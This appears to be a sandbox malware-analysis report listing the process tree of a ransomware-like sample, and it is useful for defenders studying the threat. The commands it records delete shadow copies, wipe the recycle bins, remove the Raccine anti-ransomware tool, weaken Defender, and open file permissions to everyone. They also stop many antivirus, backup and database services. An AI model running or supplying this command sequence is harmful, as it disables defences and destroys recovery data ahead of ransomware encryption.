- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:296
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:2116
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1532
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:1100
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1692
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2840
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:364
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:2420
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:4136
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:4200
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4644
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:4688
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4832
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:5012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:5068
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4952
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4776
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:4600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:2912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:2828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4920
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:2840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:2340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:4556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:4232
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:4468
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:14300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3760
- - C:\Users\Admin\AppData\Local\Temp\916CA417-15B9-425D-9C3C-92034492F028\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\916CA417-15B9-425D-9C3C-92034492F028\dismhost.exe {8871338C-26D8-49AE-9B8A-57204B3180DA}
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    PID:6860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:5060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:3228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:4940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:5108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:7320
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:8496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:1060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:11088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:5208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:12028
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:5280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:5560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:5392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:9148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:5384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:8120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:5376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:12148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:5304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:11192
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:10272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:10264
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:10248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:8480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8456
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:8440
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:8408
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:8360
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8296
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  PID:8248
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  PID:8216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:7216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:5532
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8112
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:8080
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8048
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10228
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:10220
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:10212
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:10204
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:10188
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10180
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:10172
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10164
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:10156
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:10140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10132
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10116
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:10108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:10092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10084
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10068
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10060
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10044
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:10036
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:10028
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:10020
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:10012
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:10004
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9996
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9988
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9980
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:9972
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:9964
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:9956
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:9948
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9940
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9932
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:9924
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9916
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:9908
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9900
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9892
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:9876
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:9868
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9860
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:9852
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:9836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:17280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:9828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:17272
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:9820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:17248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:9812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:17264
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:8588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:17296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:8580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:4840
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:8572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:17348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:8564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:17216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:8548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:17392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:8540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:17384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:8532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:17256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:8524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:17224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:8516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:17400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:8508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:17376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:7508
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:7500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:7492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:7484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:7476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:7468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:7460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:7452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:7444
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:7436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:7428
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:7420
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:7412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:7404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:7396
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:7388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:7380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:7372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:7364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:7356
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:6928
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:6920
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:6912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:6904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:6896
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:6888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:6880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:6872
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:6864
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:6856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:6848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:6840
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:6832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:6824
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:6816
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:6808
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:6800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:6792
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:6784
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:6776
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:6768
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:6760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:6752
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:6744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:6736
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:6728
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:6720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:6712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:6704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:6696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:6684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:6676
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:6668
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:6660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:6652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:6644
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:6636
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:6628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:6620
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:6612
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:6604
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:6596
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:6588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:6576
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:6568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:6560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:6552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:6544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:6536
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:6528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:6520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:6512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:6496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6480
